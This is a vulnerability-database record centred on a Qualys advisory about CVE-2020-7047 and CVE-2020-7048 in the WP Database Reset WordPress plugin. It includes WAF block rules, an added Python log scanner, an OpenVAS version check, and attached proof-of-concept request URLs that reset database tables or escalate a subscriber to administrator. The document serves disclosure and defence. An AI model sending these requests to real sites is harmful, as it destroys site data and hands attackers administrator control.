ID QUALYSBLOG:DE6A7709B03C1E0B715EE99CE4EB71AC Type qualysblog Reporter Sheela Sarva Modified 2020-01-24T16:00:16
Description
A vulnerability recently disclosed by Wordfence and published as CVE-2020-7047 and CVE-2020-7048 allows an attacker to take over vulnerable WordPress-based websites.
Functionality in the WP Database Reset plugin introduced the vulnerability, which allows any unauthenticated user to reset any table in the database to its initial state when it was installed, deleting all the content in the database.
It is also possible for an attacker to completely take over the target application. Given that all the data can be deleted from the database, an attacker can delete the designated WordPress admin and take over the role and become administrator of the website.
The vulnerability affects the WordPress Database Reset plugin versions prior to 3.15.
About the WordPress Database Reset Plugin
WordPress is a popular content management system (CMS). It is designed to emphasize accessibility, performance, security, and ease of use. The WordPress plugin, WP Database Reset, is used to reset databases used by WordPress installations. The plugin gives users the option of not having to go through the WordPress installation in order to reset the database.
Detecting the Vulnerability with Qualys WAS
Qualys has published QID 150274 for Qualys Web Application Scanning (WAS) that implements a passive detection of vulnerabilities present in the affected WordPress plugin.
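Remediation
To remediate the vulnerabilities, upgrade to the latest version of the WP Database Reset plugin.
Protection with Qualys WAF
If you're unable to upgrade the plugin and are a Qualys Web Application Firewall (WAF) customer, you can create custom rules to detect and block attacks that try to exploit this vulnerability.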
Specifically, set these two conditions:
request.path MATCH "^.*admin.*$"
request.query-string MATCH "^.*db-reset-tables.*$"
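Then set Actions to "Block & Log" and attach the rule to the vulnerable app.
For more information, refer to Custom Rules in the Qualys WAF Getting Started Guide (https://www.qualys.com/docs/qualys-waf-getting-started-guide.pdf).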
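The same two conditions can be applied retroactively to web-server access logs to check whether the parameter has already been requested. This is an added example, not part of the original Qualys post or of any Qualys tooling; the function names, the Combined Log Format assumption and the sample log lines are constructed for illustration. It decodes percent-encoding before matching and looks at parameter names only, which is narrower than the raw query-string regex.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request field of a Combined Log Format line: "METHOD target HTTP/x.y" status
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
PARAM = "db-reset-tables"  # parameter named in the WAF rule and the CVE descriptions

def match_rule(target):
    """Return the table names requested if both rule conditions hold, else None."""
    parts = urlsplit(target)
    # Condition 1: request.path MATCH "^.*admin.*$" (checked on the decoded path)
    if "admin" not in unquote(parts.path):
        return None
    # Condition 2: query string carries db-reset-tables; parse_qsl percent-decodes
    # names and values, so "db%2Dreset-tables%5B%5D" is seen as "db-reset-tables[]".
    tables = [value for name, value in parse_qsl(parts.query, keep_blank_values=True)
              if name.startswith(PARAM)]
    return tables or None

def scan(lines):
    """Collect one record per log line that satisfies both conditions."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue  # not a request line we can parse
        tables = match_rule(m.group("target"))
        if tables:
            hits.append({
                "client": line.split(" ", 1)[0],
                "path": urlsplit(m.group("target")).path,
                "tables": tables,
                "status": int(m.group("status")),
            })
    return hits

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Jan/2020:10:00:01 +0000] "GET /wp-admin/admin-post.php?db-reset-tables%5B%5D=comments HTTP/1.1" 200 0',
    '192.0.2.11 - - [24/Jan/2020:10:00:05 +0000] "GET /wp-admin/admin.php?db%2Dreset%2Dtables%5B%5D=users HTTP/1.1" 302 0',
    '198.51.100.7 - - [24/Jan/2020:10:01:00 +0000] "GET /wp-admin/admin.php?page=database-reset HTTP/1.1" 200 5120',
    '198.51.100.8 - - [24/Jan/2020:10:02:00 +0000] "GET /blog/?s=db-reset-tables HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit naming the `users` table from an account that is not an administrator warrants an immediate review of the site's administrator accounts.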
{"id": "QUALYSBLOG:DE6A7709B03C1E0B715EE99CE4EB71AC", "type": "qualysblog", "bulletinFamily": "blog", "title": "WordPress Database Reset Plugin Vulnerability (CVE-2020-7047, CVE-2020-7048)", "description": "A vulnerability [recently disclosed by Wordfence](<https://www.wordfence.com/blog/2020/01/easily-exploitable-vulnerabilities-patched-in-wp-database-reset-plugin/>) and published as CVE-2020-7047 and CVE-2020-7048 allows an attacker to take over vulnerable WordPress-based websites.\n\nFunctionality in the WP Database Reset plugin introduced the vulnerability, which allows any unauthenticated user to reset any table in the database to its initial state when it was installed, deleting all the content in the database.\n\nDetails about the vulnerability can be found at [CVE-2020-7047](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7047>) and [CVE-2020-7048](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7048>).\n\nIt is also possible for an attacker to completely take over the target application. Given that all the data can be deleted from the database, an attacker can delete the designated WordPress admin and take over the role and become administrator of the website.\n\nThe vulnerability affects the WordPress Database Reset plugin versions prior to 3.15.\n\n### About the WordPress Database Reset Plugin\n\n[WordPress](<https://wordpress.org/>) is a popular content management system (CMS). It is designed to emphasize accessibility, performance, security, and ease of use. The WordPress plugin, [WP Database Reset](<https://wordpress.org/plugins/wordpress-database-reset/>), is used to reset databases used by WordPress installations. 
The plugin gives users the option of not having to go through the WordPress installation in order to reset the database.\n\n### Detecting the Vulnerability with Qualys WAS\n\nQualys has published QID 150274 for [Qualys Web Application Scanning](<https://www.qualys.com/apps/web-app-scanning/>) (WAS) that implements a passive detection of vulnerabilities present in the affected WordPress plugin.\n\n_QID 150274 : WordPress Database Reset Plugin Vulnerability_\n\n[](<https://blog.qualys.com/wp-content/uploads/2020/01/blog-wordpress-image2020-1-21_15-49-56.png>)\n\n### Remediation\n\nTo remediate the vulnerabilities, upgrade to latest version of the [WP Database Reset plugin](<https://wordpress.org/plugins/wordpress-database-reset/>).\n\n### Protection with Qualys WAF\n\nIf you're unable to upgrade the plugin and are a [Qualys Web Application Firewall](<https://www.qualys.com/apps/web-app-firewall/>) (WAF) customer, you can create custom rules to detect and block attacks that try to exploit this vulnerability.\n\nSpecifically, set these two conditions:\n \n \n request.path MATCH \"^.*admin.*$\"\n request.query-string MATCH \"^.*db-reset-tables.*$\"\n\nAnd then set Actions to \"Block & Log\", and attach the rule to the vulnerable app.\n\n[](<https://blog.qualys.com/wp-content/uploads/2020/01/thumbnail_Outlook-1kbv3uze.png>)\n\nFor more information, refer to Custom Rules in the [Qualys WAF Getting Started Guide](<https://www.qualys.com/docs/qualys-waf-getting-started-guide.pdf>).", "published": "2020-01-24T16:00:16", "modified": "2020-01-24T16:00:16", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "href": "https://blog.qualys.com/webappsec/2020/01/24/wordpress-database-reset-plugin-vulnerability-cve-2020-7047-cve-2020-7048", "reporter": "Sheela Sarva", "references": [], "cvelist": ["CVE-2020-7047", "CVE-2020-7048"], "lastseen": "2020-01-30T23:28:02", "viewCount": 39, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": 
["CVE-2020-7048", "CVE-2020-7047"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310113630"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:10028", "WPVDB-ID:10027"]}, {"type": "wpexploit", "idList": ["WPEX-ID:10027", "WPEX-ID:10028"]}], "modified": "2020-01-30T23:28:02", "rev": 2}, "score": {"value": 5.3, "vector": "NONE", "modified": "2020-01-30T23:28:02", "rev": 2}, "vulnersScore": 5.3}}
{"cve": [{"lastseen": "2020-12-09T22:03:17", "description": "The WordPress plugin, WP Database Reset through 3.1, contains a flaw that gave any authenticated user, with minimal permissions, the ability (with a simple wp-admin/admin.php?db-reset-tables[]=users request) to escalate their privileges to administrator while dropping all other users from the table.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-16T21:15:00", "title": "CVE-2020-7047", "type": "cve", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7047"], "modified": "2020-01-24T20:45:00", "cpe": ["cpe:/a:webfactoryltd:wp_database_reset:3.1"], "id": "CVE-2020-7047", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-7047", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:webfactoryltd:wp_database_reset:3.1:*:*:*:*:wordpress:*:*"]}, {"lastseen": "2020-12-09T22:03:17", "description": "The WordPress plugin, WP Database Reset through 3.1, contains a flaw that allowed any unauthenticated user to reset any table in the database to the initial 
WordPress set-up state (deleting all site content stored in that table), as demonstrated by a wp-admin/admin-post.php?db-reset-tables[]=comments URI.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.2}, "published": "2020-01-16T21:15:00", "title": "CVE-2020-7048", "type": "cve", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7048"], "modified": "2020-01-28T18:13:00", "cpe": ["cpe:/a:webfactoryltd:wp_database_reset:3.1"], "id": "CVE-2020-7048", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-7048", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:webfactoryltd:wp_database_reset:3.1:*:*:*:*:wordpress:*:*"]}], "openvas": [{"lastseen": "2020-02-12T14:48:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-7048", "CVE-2020-7047"], "description": "The WordPress Plugin WP Database Reset is prone to multiple vulnerabilities.", "modified": "2020-02-07T00:00:00", "published": "2020-01-24T00:00:00", "id": "OPENVAS:1361412562310113630", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113630", "type": "openvas", "title": 
"WordPress Database Reset Plugin <= 3.1 Multiple Vulnerabilities", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113630\");\n script_version(\"2020-02-07T08:57:05+0000\");\n script_tag(name:\"last_modification\", value:\"2020-02-07 08:57:05 +0000 (Fri, 07 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-24 09:27:36 +0000 (Fri, 24 Jan 2020)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2020-7047\", \"CVE-2020-7048\");\n\n script_name(\"WordPress Database Reset Plugin <= 3.1 Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_wordpress_plugin_http_detect.nasl\");\n script_mandatory_keys(\"wordpress-database-reset/detected\");\n\n script_tag(name:\"summary\", value:\"The WordPress Plugin WP Database Reset is prone to multiple vulnerabilities.\");\n\n 
script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The following vulnerabilities exist:\n\n - Any authenticated user with minimal permissions can escalate their privileges\n to administrator while dropping all other users from the table with a\n wp-admin/admin.php?db-reset-tables[]=users request.\n\n - Any unauthenticated user can reset any table in the database to the initial\n WordPress set-up state (deleting all site content stored in that table) via\n the wp-admin/admin-post.php?db-reset-tables[]=comments URI.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation would allow an attacker to wipe all of the site's data\n or even gain complete control over the target system.\");\n\n script_tag(name:\"affected\", value:\"WordPress Database Reset plugin through version 3.1.\");\n\n script_tag(name:\"solution\", value:\"Update to version 3.15.\");\n\n script_xref(name:\"URL\", value:\"https://wordpress.org/plugins/wordpress-database-reset/#developers\");\n script_xref(name:\"URL\", value:\"https://wpvulndb.com/vulnerabilities/10027\");\n script_xref(name:\"URL\", value:\"https://wpvulndb.com/vulnerabilities/10028\");\n script_xref(name:\"URL\", value:\"https://www.wordfence.com/blog/2020/01/easily-exploitable-vulnerabilities-patched-in-wp-database-reset-plugin/\");\n\n exit(0);\n}\n\n\nCPE = \"cpe:/a:webfactoryltd:wordpress-database-reset\";\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! 
infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) ) exit( 0 );\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nif( version_is_less_equal( version: version, test_version: \"3.1\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.15\", install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "wpexploit": [{"lastseen": "2020-12-09T21:00:35", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-7047"], "description": "This flaw \"allowed any authenticated user, even those with minimal permissions, the ability to grant their account administrative privileges while dropping all other users from the table with a simple request.\"\n", "modified": "2020-09-22T08:25:32", "published": "2020-01-16T00:00:00", "id": "WPEX-ID:10028", "href": "", "type": "wpexploit", "title": "WP Database Reset < 3.15 - Privilege Escalation", "sourceData": "Login as a subscriber then send the following request:\r\n\r\nURL/wp-admin/admin.php?db-reset-tables%5B%5D=users&db-reset-code=11111&db-reset-code-confirm=11111", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-12-09T21:03:11", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-7048"], "description": "This flaw \"allowed any unauthenticated user to reset any table from the database to the initial WordPress set-up state.\"\n", "modified": "2020-09-22T08:25:31", "published": "2020-01-16T00:00:00", "id": "WPEX-ID:10027", "href": "", "type": "wpexploit", "title": "WP Database Reset < 3.15 - Unauthenticated Database Reset", "sourceData": "URL/wp-admin/admin-post.php?db-reset-tables%5B%5D=comments&db-reset-code=11111&db-reset-code-confirm=11111\r\n\r\nWhere you can set db-reset-tables%5B%5D to any database table you want to delete.", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "wpvulndb": 
[{"lastseen": "2020-12-09T21:00:35", "bulletinFamily": "software", "cvelist": ["CVE-2020-7047"], "description": "This flaw \"allowed any authenticated user, even those with minimal permissions, the ability to grant their account administrative privileges while dropping all other users from the table with a simple request.\"\n\n### PoC\n\nLogin as a subscriber then send the following request: URL/wp-admin/admin.php?db-reset-tables%5B%5D=users&db-reset-code=11111&db-reset-code-confirm=11111\n", "modified": "2020-09-22T08:25:32", "published": "2020-01-16T00:00:00", "id": "WPVDB-ID:10028", "href": "https://wpvulndb.com/vulnerabilities/10028", "type": "wpvulndb", "title": "WP Database Reset < 3.15 - Privilege Escalation", "sourceData": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-12-09T21:03:11", "bulletinFamily": "software", "cvelist": ["CVE-2020-7048"], "description": "This flaw \"allowed any unauthenticated user to reset any table from the database to the initial WordPress set-up state.\"\n\n### PoC\n\nURL/wp-admin/admin-post.php?db-reset-tables%5B%5D=comments&db-reset-code=11111&db-reset-code-confirm=11111 Where you can set db-reset-tables%5B%5D to any database table you want to delete.\n", "modified": "2020-09-22T08:25:31", "published": "2020-01-16T00:00:00", "id": "WPVDB-ID:10027", "href": "https://wpvulndb.com/vulnerabilities/10027", "type": "wpvulndb", "title": "WP Database Reset < 3.15 - Unauthenticated Database Reset", "sourceData": "", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}]}